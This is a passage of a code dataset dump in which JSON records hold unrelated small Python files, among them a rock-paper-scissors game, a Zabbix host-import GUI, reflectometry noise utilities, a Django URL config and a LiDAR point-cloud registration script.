H,h\n\n","repo_name":"asyqsg/NOMA_GMAE","sub_path":"get_HAndh.py","file_name":"get_HAndh.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"41510779131","text":"__author__ = 'Michael'\nfrom src import PClass\n\nclass PLayer(object):\n m_p_num = None\n p_list = []\n\n def __init__(self, p_num, p_num_inputs):\n self.m_p_num = p_num\n for x in range(0, self.m_p_num):\n self.p_list.append(PClass(p_num_inputs))\n","repo_name":"michaellee1/ANN-PCML","sub_path":"src/PLayer.py","file_name":"PLayer.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"44258135305","text":"from os import environ\nfrom webbrowser import get\n\ngetallen=[1,2,3,5,7,8,10,12,13,14,15,16,21,22,23,24,26,30,31,32,33,43,44,46,47]\n\nnummer = len(getallen)\nprint(nummer)\n\nevengetallen= 0\nonevengetallen= 0\nBoring= 0\nfor getal in getallen:\n if getal %2 == 0:\n evengetallen += 1\n else:\n onevengetallen += 1\n\n\nprint(evengetallen)\nprint(onevengetallen)\nBoring = []\nfor i in range(len(getallen)):\n if i %2 == getallen[i] %2:\n Boring.append(getallen[i])\n\nprint(len(Boring))\n\n\n\n","repo_name":"Rouamu/challenge","sub_path":"challenge1.py","file_name":"challenge1.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"463154529","text":"import random, sys, time\n\nprint('''\n ---------------------------------------\n| Welcome To Rock Paper Scissors Game! |\n| Rock: r |\n| Paper: p |\n| Scissors: s |\n| Good Luck! |\n --------------------------------------\n''')\nplayer_score = 0\ncomputer_score = 0\ndef Game(player_score, computer_score):\n moves = ['r', 'p', 's'] #available moves\n player_wins = ['pr', 'sp', 'rs'] #combination of when player wins\n\n while True: #while user wants to play, ask again\n player_move = input(\"Your Move: \")#getting user's move\n if player_move not in moves:\n print(\"Invalid Move.\")\n continue\n computer_move = random.choice(moves) #computer makes random choice\n print(\"Computer's Move: \", computer_move)\n if player_move == computer_move:\n print(\"Tie\")\n elif player_move+computer_move in player_wins:\n player_score += 1 \n print(\"You Win!\")\n else:\n computer_score += 1\n print(\"You Lose.\")\n while True: #checking for is user wants to play again\n answer = input(\"Play again? (y/n): \") \n if answer not in ('y', 'n'):\n print(\"Invalid Input\")\n continue\n if answer == 'y':\n Game(player_score, computer_score) # also we need to pass the variables if we want to use them in next game() \n sys.exit()\n else:\n print(\"Your score:\", int(player_score))\n print(\"Computer's score:\", int(computer_score))\n print(\"Goodbye!\")\n time.sleep(3)\n sys.exit()\n \n\nGame(player_score, computer_score)\n","repo_name":"doganaktarr/Simple-Python-Projects","sub_path":"Rock Paper Scissors Game/rock_paper_scissors_game.py","file_name":"rock_paper_scissors_game.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"70235607503","text":"import setuptools\r\n\r\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\r\n long_description = fh.read()\r\n\r\nsetuptools.setup(\r\n name=\"example-pkg-yuval-shaul\",\r\n version=\"0.0.1\",\r\n author=\"Yuval Shaul\",\r\n author_email=\"yuval.shaul@gmail.com\",\r\n description=\"Classes to make your aws code easier.\",\r\n long_description=long_description,\r\n long_description_content_type=\"text/markdown\",\r\n url=\"https://github.com/YuvalShaul/easyawslib\",\r\n packages=setuptools.find_packages(),\r\n classifiers=[\r\n \"Programming Language :: Python :: 3\",\r\n \"License :: OSI Approved :: MIT License\",\r\n \"Operating System :: OS Independent\",\r\n ],\r\n python_requires='>=3.6',\r\n)","repo_name":"YuvalShaul/easyawslib","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"45257604874","text":"import functools\r\nfrom typing import Union, Tuple\r\n\r\nimport numpy as np\r\nfrom numpy import ndarray\r\n\r\nfrom .distributions import random_logarithmic_distribution\r\n\r\n\r\ndef iterate_over_curves(func):\r\n @functools.wraps(func)\r\n def wrapper(reflectivity_curves, *args, **kwargs):\r\n number_of_dimensions = len(reflectivity_curves.shape)\r\n if number_of_dimensions not in (1, 2):\r\n raise ValueError('number of dimensions mus be 1 or 2')\r\n if number_of_dimensions == 1:\r\n return func(reflectivity_curves, *args, **kwargs)\r\n else:\r\n return np.array([func(reflectivity_curve, *args, **kwargs) for reflectivity_curve in reflectivity_curves])\r\n\r\n return wrapper\r\n\r\n\r\ndef apply_uniform_noise(refl, noise_range):\r\n shape = refl.shape\r\n noise_factors = np.random.uniform(*noise_range, shape)\r\n return refl * noise_factors\r\n\r\n\r\ndef apply_scaling_factor(refl, scale_factor_range):\r\n refl = np.atleast_2d(refl).copy()\r\n n_curves = len(refl)\r\n scale_factors = np.random.uniform(*scale_factor_range, n_curves)\r\n for i in range(n_curves):\r\n refl[i] *= scale_factors[i]\r\n if n_curves == 1:\r\n return refl[0]\r\n else:\r\n return refl\r\n\r\n\r\ndef apply_shot_noise(reflectivity_curves: ndarray, shot_noise_spread: Union[float, Tuple[float, float]]) -> Tuple[\r\n ndarray, ndarray]:\r\n \"\"\"Returns reflectivity curves with applied shot noise based on `shot_noise_spread`.\r\n\r\n Args:\r\n reflectivity_curves: Array of normalized reflectivity curves\r\n shot_noise_spread: Scaling factor c for the standard deviation sqrt(I*c) of the shot noise around\r\n the intensity of simulated reflectivity curves. Since the intensity is normalized, this is\r\n equivalent to setting the direct beam intensity I_0 = 1/c. If a tuple with two values is given,\r\n a random value between the two is chosen for each curve.\r\n\r\n Returns:\r\n noisy_reflectivity, spreads\r\n \"\"\"\r\n dimensions = len(reflectivity_curves.shape)\r\n if dimensions == 1:\r\n num_curves = 1\r\n elif dimensions == 2:\r\n num_curves = len(reflectivity_curves)\r\n else:\r\n raise ValueError('number of dimensions mus be 1 or 2')\r\n\r\n if type(shot_noise_spread) in (float, int):\r\n spreads = np.repeat(shot_noise_spread, num_curves)\r\n elif type(shot_noise_spread) is tuple:\r\n spreads = random_logarithmic_distribution(*shot_noise_spread, num_curves)\r\n else:\r\n raise TypeError(f'shot_noise_spread must be float or tuple and is {type(shot_noise_spread)}')\r\n\r\n if num_curves == 1:\r\n noisy_reflectivity = np.clip(np.random.normal(reflectivity_curves, np.sqrt(reflectivity_curves * spreads[0])),\r\n 1e-16, None)\r\n else:\r\n noisy_reflectivity = np.array(\r\n [np.clip(np.random.normal(curve, np.sqrt(curve * spread)), 1e-16, None) for curve, spread in\r\n zip(reflectivity_curves, spreads)])\r\n return noisy_reflectivity, spreads\r\n\r\n\r\ndef apply_poisson_noise(reflectivity_curves: ndarray, rate_spread: Union[float, Tuple[float, float]]) -> Tuple[\r\n ndarray, ndarray]:\r\n \"\"\"Returns reflectivity curves with applied shot noise based on `shot_noise_spread`.\r\n\r\n Args:\r\n reflectivity_curves: Array of normalized reflectivity curves\r\n rate_spread: Scaling factor c for the standard deviation sqrt(I*c) of the shot noise around\r\n the intensity of simulated reflectivity curves. Since the intensity is normalized, this is\r\n equivalent to setting the direct beam intensity I_0 = 1/c. If a tuple with two values is given,\r\n a random value between the two is chosen for each curve.\r\n\r\n Returns:\r\n noisy_reflectivity, spreads\r\n \"\"\"\r\n dimensions = len(reflectivity_curves.shape)\r\n if dimensions == 1:\r\n num_curves = 1\r\n elif dimensions == 2:\r\n num_curves = len(reflectivity_curves)\r\n else:\r\n raise ValueError('number of dimensions mus be 1 or 2')\r\n\r\n if type(rate_spread) in (float, int):\r\n spreads = np.repeat(rate_spread, num_curves)\r\n elif type(rate_spread) is tuple:\r\n spreads = random_logarithmic_distribution(*rate_spread, num_curves)\r\n else:\r\n raise TypeError(f'rate_spread must be float or tuple and is {type(rate_spread)}')\r\n\r\n if num_curves == 1:\r\n noisy_reflectivity = np.clip(np.random.poisson(reflectivity_curves * spreads[0]) / spreads[0], 1e-16, None)\r\n else:\r\n noisy_reflectivity = np.array(\r\n [np.clip(np.random.poisson(curve * spread) / spread, 1e-16, None) for curve, spread in\r\n zip(reflectivity_curves, spreads)])\r\n return noisy_reflectivity, spreads\r\n\r\n\r\ndef generate_background(number_of_curves: int, number_of_q_values: int,\r\n background_base_level: Union[float, Tuple[float, float]],\r\n relative_background_spread: float) -> Tuple[ndarray, ndarray]:\r\n \"\"\"Returns a background with a normal distribution that can be added to a reflectivity curve.\r\n\r\n Args:\r\n number_of_curves: Number of curves for which a background is generated\r\n number_of_q_values: Length of the generated array (should be same length as reflectivity curve)\r\n background_base_level: Range from which the mean of the normal distribution is chosen\r\n relative_background_spread: Relative standard deviation of the normal distribution (e.g. a value of ``0.1``\r\n means the standard deviation is 10% of the mean)\r\n\r\n Returns:\r\n background, means: background has dimensions ``(number_of_curves, number_of_q_values)``\r\n \"\"\"\r\n\r\n if type(background_base_level) in (float, int):\r\n return np.random.normal(background_base_level, relative_background_spread * background_base_level,\r\n (number_of_curves, number_of_q_values)), np.repeat(background_base_level,\r\n number_of_curves)\r\n elif type(background_base_level) is tuple:\r\n mean = random_logarithmic_distribution(*background_base_level, number_of_curves)\r\n means = np.tile(mean, (number_of_q_values, 1)).T\r\n stdevs = relative_background_spread * means\r\n return np.random.normal(means, stdevs, (number_of_curves, number_of_q_values)), mean\r\n else:\r\n raise TypeError(f'background_base_level must be float, int or tuple and is {type(background_base_level)}')\r\n","repo_name":"schreiber-lab/mlreflect","sub_path":"mlreflect/data_generation/noise.py","file_name":"noise.py","file_ext":"py","file_size_in_byte":6625,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"47"} +{"seq_id":"8852194054","text":"import os\nfrom flask import Flask, request, redirect, url_for, send_from_directory, render_template\nfrom detect import detect_model\nimport json\n\nUPLOAD_FOLDER = './uploads'\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg',])\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n \n@app.route('/', methods=['GET', 'POST'])\n\ndef upload_file():\n if request.method == 'POST':\n image_file = request.files['file']\n if image_file and allowed_file(image_file.filename):\n image_file.save(os.path.join(app.config['UPLOAD_FOLDER'], image_file.filename))\n queue.put()\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port = 8181)\n","repo_name":"vignesh-madanan/AIforimagev2","sub_path":"app/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30222955395","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTests for interfaces.py.\n\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n# disable: accessing protected members, too many methods\n# pylint: disable=W0212,R0904\n\nimport unittest\n\nclass AbstractPrincipal(object):\n id = 'id'\n email = 'sjohnson@nextthought.com'\n\n def __conform__(self, iface):\n return self\n\n\nclass TestEmailAddressablePrincipal(unittest.TestCase):\n\n def _makeOne(self, context):\n from nti.mailer.interfaces import EmailAddressablePrincipal\n return EmailAddressablePrincipal(context)\n\n def test_copies_title(self):\n class Context(AbstractPrincipal):\n id = 'id'\n title = 'MyTitle'\n\n prin = self._makeOne(Context())\n self.assertIs(prin.id, Context.id)\n self.assertIs(prin.email, Context.email)\n self.assertIs(prin.title, Context.title)\n self.assertIsNone(prin.description)\n\n def test_copies_description(self):\n class Context(AbstractPrincipal):\n id = 'id'\n description = 'MyDesc'\n\n prin = self._makeOne(Context())\n self.assertIs(prin.id, Context.id)\n self.assertIs(prin.email, Context.email)\n self.assertIs(prin.description, Context.description)\n self.assertIsNone(prin.title)\n\n def test_str_repr(self):\n prin = self._makeOne(AbstractPrincipal())\n expected = 'Principal(id/sjohnson@nextthought.com)'\n self.assertEqual(str(prin), expected)\n self.assertEqual(repr(prin), expected)\n","repo_name":"OpenNTI/nti.mailer","sub_path":"src/nti/mailer/tests/test_interfaces.py","file_name":"test_interfaces.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24829276745","text":"from datetime import datetime\nimport readline\nfrom unicodedata import numeric\nimport sys\nfrom threading import Thread\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5 import uic\nimport csv\nimport re\nfrom zabbix_api import ZabbixAPI\nimport os\n\n\napp = QApplication([])\nwindow = uic.loadUi('layout.ui')\nwindow.setWindowTitle('Cadastro no Zabbix por API - @chriscoliveira')\n\n# faz a conexão com o zabbix\nwith open('config.cfg', 'r') as arquivo:\n zabbix_server, zabbix_user, zabbix_pass = '', '', ''\n linhas = arquivo.readlines()\n for linha in linhas:\n if 'server' in linha:\n zabbix_server = linha.split('=')[1].strip()\n if 'user' in linha:\n zabbix_user = linha.split('=')[1].strip()\n if 'pass' in linha:\n zabbix_pass = linha.split('=')[1].strip()\n zapi = ZabbixAPI(server=zabbix_server)\n zapi.login(zabbix_user, zabbix_pass)\n\n\ndef le_grupos_cfg():\n GRUPOID = []\n with open('names_groups_templates.cfg', 'r') as arquivo:\n linhas = arquivo.readlines()\n\n for linha in linhas:\n if not linha.startswith('#'):\n nome, grupo, template = linha.split(',')\n nome = nome.replace(' ', '').upper()\n grupo = grupo.replace(' ', '').upper()\n template = template.replace('\\n', '').replace(' ', '').upper()\n GRUPOID.append([nome, grupo, template])\n return GRUPOID\n\n\ndef get_grupo_template(nome_grupo_host):\n with open('names_groups_templates.cfg', 'r') as arquivo:\n linhas = arquivo.readlines()\n GRUPOID = []\n for linha in linhas:\n if not linha.startswith('#'):\n nome, grupo, template = linha.split(',')\n nome = nome.replace(' ', '').upper()\n grupo = grupo.replace(' ', '').upper()\n template = template.replace('\\n', '').replace(' ', '').upper()\n if nome_grupo_host in linha:\n GRUPOID.append([nome, grupo, template])\n\n for x in GRUPOID:\n if nome_grupo_host == x[0]:\n return x[1], x[2]\n\n\ndef abrir_csv():\n caminho, _ = QFileDialog.getOpenFileName(\n window.centralwidget,\n 'Abrir imagem',\n os.getcwd(),\n options=QFileDialog.DontUseNativeDialog\n )\n return caminho\n\n\ndef get_grupo_loja(loja):\n ct = ''\n if loja:\n grupo_loja = zapi.hostgroup.get({\n 'output': 'extend',\n 'search': {\n 'name': loja\n },\n 'sortfield': 'name',\n 'sortorder': 'ASC'\n })\n for x in grupo_loja:\n ct = x['groupid']\n print(x['groupid'])\n return x['groupid']\n\n\ndef mapa_zabbix():\n loja = window.ed_ct.text().upper().replace('CT', '')\n if loja:\n with open('ct.txt', 'w') as f:\n f.write(loja)\n os.system('python3 api_cria_mapa.py')\n else:\n QMessageBox.about(\n window, 'Erro', 'Precisa informar o numero da filial')\n\n\ndef getnametemplates(pesquisa=False):\n # zapi = ZabbixAPI(server=\"http://10.131.0.30/zabbix\")\n # zapi.login(\"USUARIO_API\", \"tenda123\")\n if pesquisa:\n itens = zapi.template.get({\n 'output': 'extend',\n 'sortfield': 'name',\n 'sortorder': 'ASC'\n })\n\n msg = 'Exibe os templates do zabbix'\n with open('envioTelegram.txt', 'w') as arquivo:\n arquivo.write(f'\\n{msg}\\n')\n\n for item in itens:\n if item['templateid'] == pesquisa:\n return item['host']\n\n\ndef getnameGrupo(pesquisa=False):\n # zapi = ZabbixAPI(server=\"http://10.131.0.30/zabbix\")\n # zapi.login(\"USUARIO_API\", \"tenda123\")\n if pesquisa:\n hosts = zapi.hostgroup.get({\n 'output': 'extend',\n 'sortfield': 'name',\n 'sortorder': 'ASC'\n })\n\n for host in hosts:\n if host['groupid'] == pesquisa:\n print(host['name'])\n return host['name']\n\n\ndef cadastra_zabbix():\n # coleta os dados para cadastro\n fcsv = abrir_csv()\n grupo = window.ed_ct.text().upper().replace('CT', '')\n GrupoIDLoja = get_grupo_loja(grupo)\n GrupoIDGrupo, TemplateID = get_grupo_template(\n window.comboBox.currentText())\n\n # verifica se os dados foram preenchidos\n if fcsv and GrupoIDLoja and GrupoIDGrupo and TemplateID and grupo:\n print(fcsv, GrupoIDLoja, GrupoIDGrupo, TemplateID, sep='\\n')\n retorno = QMessageBox.question(\n window, 'MUITA ATENÇÃO!!!', f\"Tem certeza que deseja cadastrar os itens??\\n\\nArquivo CSV:{fcsv}\\nLoja {getnameGrupo(GrupoIDLoja)}\\nGrupo Host: {getnameGrupo(GrupoIDGrupo)}\\nTemplate: {getnametemplates(pesquisa=TemplateID)}\", QMessageBox.Yes | QMessageBox.No)\n\n # se o usuario confirmar o cadastro\n if retorno == QMessageBox.Yes:\n itemadd = []\n print(f'arquivo csv {fcsv}')\n itemADD = open(f'{fcsv}')\n\n # verifica o delimitador do arquivo\n sniffer = csv.Sniffer()\n with open(fcsv) as fp:\n delimiter = sniffer.sniff(fp.read(5000)).delimiter\n\n # abre a planilha\n listas = csv.reader(itemADD, delimiter=delimiter)\n\n itemadd1 = []\n itemadd = []\n for lista in listas:\n try:\n itemadd1 = lista[0], lista[1], lista[2]\n itemadd.append(itemadd1)\n except Exception as e:\n pass\n print(itemadd)\n\n # inicia o cadastro no zabbix\n contador = 0\n for x in itemadd:\n nome = x[0]\n iP = x[1]\n descricao = x[2]\n print(\n f'NOME {nome.upper()}, IP {iP.upper()}, DESC {descricao.upper()}')\n try:\n hostcriado = zapi.host.create({\n \"host\": nome.upper(),\n \"status\": 0,\n \"description\": descricao.upper(),\n \"interfaces\": [\n {\n \"type\": 1,\n \"main\": 1,\n \"useip\": 1,\n \"ip\": iP,\n \"dns\": \"\",\n \"port\": \"10050\"\n },\n {\n \"type\": 2,\n \"main\": 1,\n \"useip\": 1,\n \"ip\": iP,\n \"dns\": \"\",\n \"port\": \"161\",\n \"details\": {\n \"version\": 3,\n \"bulk\": 0,\n \"contextname\": \"\",\n \"securitylevel\": 1}\n }\n ],\n \"groups\": [\n {\n \"groupid\": GrupoIDLoja\n },\n {\n \"groupid\": GrupoIDGrupo\n }\n ],\n \"templates\": [\n {\n \"templateid\": TemplateID\n }\n ]\n })\n\n contador = contador + 1\n print(nome + \" criado! id:\" + hostcriado[\"hostids\"][0])\n except Exception as e:\n print(f'\\n\\nErro ao cadastrar o host.\\n\\n{e}')\n print(\"\\nTotal de itens cadastrados:\" + str(contador))\n\n # cadastro finalizado\n QMessageBox.about(window, 'Importação',\n f'Foram Cadastrados {contador} itens')\n\n # caso falte algum campo exibe mensagem de erro\n else:\n QMessageBox.about(window, 'Importação',\n f'Para cadastrar os itens é necessário preencher todos os campos')\n\n\ndef testecsv():\n fcsv = r'/Scripts/RABBIX/teste.csv'\n itemadd = []\n print(f'arquivo csv {fcsv}')\n itemADD = open(f'{fcsv}')\n\n # verifica o delimitador do arquivo\n sniffer = csv.Sniffer()\n with open(fcsv) as fp:\n delimiter = sniffer.sniff(fp.read(5000)).delimiter\n\n # abre a planilha\n listas = csv.reader(itemADD, delimiter=delimiter)\n\n itemadd1 = []\n itemadd = []\n for lista in listas:\n try:\n itemadd1 = lista[0], lista[1], lista[2]\n itemadd.append(itemadd1)\n except Exception as e:\n pass\n print(itemadd)\n\n\ndef carregaCombo():\n lista = le_grupos_cfg()\n listagem = []\n for item in lista:\n listagem.append(item[0])\n window.comboBox.addItems(listagem)\n\n\ncarregaCombo()\nwindow.bt_enviar.clicked.connect(cadastra_zabbix)\nwindow.bt_mapa.clicked.connect(mapa_zabbix)\n# window.bt_mapa.clicked.connect(testecsv)\nwindow.show()\napp.exec()\n","repo_name":"chriscoliveira/RABBIX","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9115,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"11022687807","text":"import socket\nfrom lockfile import LockTimeout, AlreadyLocked\nimport time\n\n\nclass SocketLock(object):\n timeout = None\n lockname = None\n\n def __init__(self, lockname, timeout=None):\n #can't use super here as LinkFileLock is an old style class\n self.lockname = lockname\n self.timeout = timeout\n\n def acquire(self, timeout=None):\n if not timeout:\n timeout = self.timeout\n\n end_time = time.time()\n if timeout is not None and timeout > 0:\n end_time += timeout\n\n while True:\n try:\n self.socket = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)\n self.socket.bind('\\0' + self.lockname)\n return\n except socket.error:\n if timeout is not None and time.time() > end_time:\n if timeout > 0:\n raise LockTimeout\n else:\n raise AlreadyLocked\n time.sleep(timeout is not None and timeout / 10 or 0.1)\n\n def release(self):\n self.socket.close()\n\n def __enter__(self):\n \"\"\"\n Context manager support.\n \"\"\"\n self.acquire()\n return self\n\n def __exit__(self, *_exc):\n \"\"\"\n Context manager support.\n \"\"\"\n self.release()\n","repo_name":"mmrazik/simu","sub_path":"simu/socketlock.py","file_name":"socketlock.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30116896914","text":"#!/usr/bin/python3\n# Author - Samuel Chigozie\n\"\"\"Output numbers 1 to 100 with a space as a separator.\nIf a number is divisible by 3, print \"Fizz\" instead of the number.\nIf a number is divisible by 5, print \"Buzz\" instead of the number.\nIf a num is divisible by both 3 & 5, print \"FizzBuzz\" than num.\n\"\"\"\n\n\ndef fizzbuzz():\n for number in range(1, 101):\n if number % 3 == 0 and number % 5 == 0:\n print(\"FizzBuzz \", end=\"\")\n elif number % 3 == 0:\n print(\"Fizz \", end=\"\")\n elif number % 5 == 0:\n print(\"Buzz \", end=\"\")\n else:\n print(\"{} \".format(number), end=\"\")\n","repo_name":"Samuelchigozie/alx-higher_level_programming","sub_path":"0x01-python-if_else_loops_functions/12-fizzbuzz.py","file_name":"12-fizzbuzz.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"1214974620","text":"# coding=utf8\nfrom django.conf import settings\nfrom django.conf.urls import include, url\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n url(r'', include(\"risk_auth.urls\", namespace='risk_auth')),\n url(r'permissions/', include(\"permissions.urls\", namespace=\"permissions\")),\n url(r'strategy/', include(\"strategy.urls\", namespace=\"strategy\")),\n url(r'menu/', include(\"menu.urls\", namespace=\"menus\")),\n url(r'rule/', include(\"rule.urls\", namespace=\"rule\")),\n url(r'config/', include(\"bk_config.urls\", namespace=\"config\")),\n url(r'log_manage/', include(\"log_manage.urls\", namespace=\"log_manage\")),\n]\n\n# 用于线上时应移除此部分,动静分离\nurlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nif not settings.DEBUG:\n from django.views.defaults import (page_not_found, server_error,\n permission_denied)\n\n urlpatterns += [\n url(r'404/', page_not_found),\n url(r'500/', server_error),\n url(r'403/', permission_denied),\n ]\n","repo_name":"momosecurity/aswan","sub_path":"www/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":2910,"dataset":"github-code","pt":"47"} +{"seq_id":"29591187447","text":"# File :main_LineIntersectionPoints.py\r\n# Author :WJ\r\n# Function :\r\n# Time :2021/03/18\r\n# Version :\r\n# Amend :\r\n\r\nimport numpy as np\r\nimport src.DensityOfProjectedPoints as DoPP\r\nimport src.GraphMatchByLineIntersectionPoints as GM_LIPoint\r\nimport src.IterativeClosestPoints as ICP\r\nimport src.Registration_H as Reg_H\r\n\r\nif __name__ == '__main__':\r\n # name = 'PCB'\r\n name = 'ABC'\r\n if name == 'ABC':\r\n\r\n # 1.导入原始数据\r\n lidar0 = np.loadtxt('..\\\\data\\\\ABC\\\\CSU_ABC_cut.txt', delimiter=',')\r\n lidar = lidar0[:, :3]\r\n dlg0 = np.loadtxt('..\\\\data\\\\ABC\\\\Polyline_ABC.txt', delimiter=',')\r\n dlg = dlg0[:, :3]\r\n\r\n # 2.DoPP\r\n lidar_dopp = DoPP.DoPP.run(lidar, 10, 1, 10, name)\r\n\r\n # 3.图匹配\r\n R1, T1, lidar_dopp = GM_LIPoint.all_Ransac.run(dlg, lidar_dopp, name)\r\n\r\n # 4.ICP\r\n R2, T2, rmse = ICP.ICP(lidar_dopp, dlg[:, :2], 45, 100)\r\n\r\n # 5.应用变换参数、输出平面配准完成的LiDARD点云\r\n lidar[:, :2] = ICP.Transform(lidar[:, :2], R1, T1)\r\n lidar[:, :2] = ICP.Transform(lidar[:, :2], R2, T2)\r\n np.savetxt('..\\\\output\\\\ABC\\\\CSU_ABC_2D_LIPoint.txt', lidar, delimiter=',')\r\n\r\n # 6.高程配准、输出配准好的LiDAR点云\r\n lidar, Z, z_rmse = Reg_H.registration_roof(dlg, lidar)\r\n np.savetxt('..\\\\output\\\\ABC\\\\CSU_ABC_3D_LIPoint.txt', lidar, delimiter=',')\r\n GM_LIPoint.output(R1, T1, R2, T2, Z, rmse, z_rmse, '..\\\\output\\\\ABC\\\\MatchResult_ABC_LIPoint.txt')\r\n\r\n elif name == 'PCB':\r\n\r\n # 导入原始数据\r\n lidar0 = np.loadtxt('..\\\\data\\\\PCB\\\\CSU_PCB_cut_02.txt', delimiter=',')\r\n lidar = lidar0[:, :3]\r\n dlg0 = np.loadtxt('..\\\\data\\\\PCB\\\\Polyline_PCB.txt', delimiter=',')\r\n dlg = dlg0[:, :3]\r\n\r\n # DoPP\r\n lidar_dopp = DoPP.DoPP.run(lidar, 1, 0.5, 10, name)\r\n\r\n # 图匹配\r\n R1, T1, lidar_dopp = GM_LIPoint.all_Ransac.run(dlg, lidar_dopp, name)\r\n print('图匹配所求参数')\r\n print(R1)\r\n print(T1)\r\n\r\n # ICP\r\n R2, T2, rmse = ICP.ICP(lidar_dopp, dlg[:, :2], 45, 100)\r\n print('ICP所求参数')\r\n print(R2)\r\n print(T2)\r\n\r\n # 刚体变换\r\n lidar[:, :2] = ICP.Transform(lidar[:, :2], R1, T1)\r\n lidar[:, :2] = ICP.Transform(lidar[:, :2], R2, T2)\r\n np.savetxt('..\\\\output\\\\PCB\\\\CSU_PCB_2D_LIPoint.txt', lidar, delimiter=',')\r\n\r\n # 高程配准\r\n VertailControlPoints = np.loadtxt('..\\\\data\\\\PCB\\\\CSU_PCB_VertailControlPoints.txt', delimiter=',')\r\n lidar, Z, z_rmse = Reg_H.registration_vertialPoints(VertailControlPoints, lidar, r=0.5)\r\n np.savetxt('..\\\\output\\\\PCB\\\\CSU_PCB_3D_LIPoint.txt', lidar, delimiter=',')\r\n GM_LIPoint.output(R1, T1, R2, T2, Z, rmse, z_rmse, '..\\\\output\\\\PCB\\\\MatchResult_PCB_LIPoint.txt')\r\n","repo_name":"Anonymous772066235/GraduationDesignProgram","sub_path":"Lidar_DLG/src/main_LineIntersectionPoints.py","file_name":"main_LineIntersectionPoints.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"6944141936","text":"\"\"\"\nlog.py: Setup a logger that has colours!\n\"\"\"\n\nimport io\nimport logging\nfrom contextlib import contextmanager\n\nimport coloredlogs\n\nFIELD_STYLES = dict(levelname=dict(color=\"green\", bold=coloredlogs.CAN_USE_BOLD_FONT))\n\n\ndef setup_logger(name):\n \"\"\"Create logger and configure with cool colors!\"\"\"\n logger = logging.getLogger(name)\n\n # Use level='NOTSET' (most permissive) here so whatever level the user later selects\n # does get printed. with level='INFO' here, setting LOGGER.setLevel('DEBUG') in the\n # app doesn't work, and therefore the --debug command line options doesn't work.\n coloredlogs.install(\n level=\"NOTSET\",\n fmt=\"%(levelname)s - %(message)s\",\n logger=logger,\n field_styles=FIELD_STYLES,\n )\n\n logger.setLevel(\"INFO\") # default logging level is INFO\n return logger\n\n\nLOGGER = setup_logger(\"root\")\n\n\n@contextmanager\ndef capture_logs():\n \"\"\"Context manager to capture the logs in a StringIO within the managed context\n\n Usage:\n with capture_logs() as captured_logs:\n do stuff that logs\n logging_output = captured_log.getvalue()\n \"\"\"\n log_capture_stream = io.StringIO()\n stream_handler = logging.StreamHandler(log_capture_stream)\n stream_handler.setLevel(logging.INFO)\n old_handlers = list(LOGGER.handlers)\n for x in old_handlers:\n LOGGER.removeHandler(x) # suppress all existing handlers\n try:\n LOGGER.addHandler(stream_handler) # capture logging output\n LOGGER.propagate = False # suppresses logging output to console\n yield log_capture_stream\n finally:\n LOGGER.removeHandler(stream_handler)\n LOGGER.propagate = True\n for x in old_handlers:\n LOGGER.addHandler(x)\n","repo_name":"ReadAlongs/Studio","sub_path":"readalongs/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"47"} +{"seq_id":"6227009521","text":"from flask.cli import AppGroup\nfrom .users import seed_users, undo_users\nfrom .patientcards import seed_patientCards, undo_patientCards\nfrom .diagnosis import seed_diagnosis, undo_diagnosis\n\n# Creates a seed group to hold our commands\n# So we can type `flask seed --help`\nseed_commands = AppGroup('seed')\n\n\n# Creates the `flask seed all` command\n@seed_commands.command('all')\ndef seed():\n seed_users()\n seed_patientCards()\n seed_diagnosis()\n # Add other seed functions here\n\n\n# Creates the `flask seed undo` command\n@seed_commands.command('undo')\ndef undo():\n undo_users()\n undo_patientCards()\n undo_diagnosis()\n # Add other undo functions 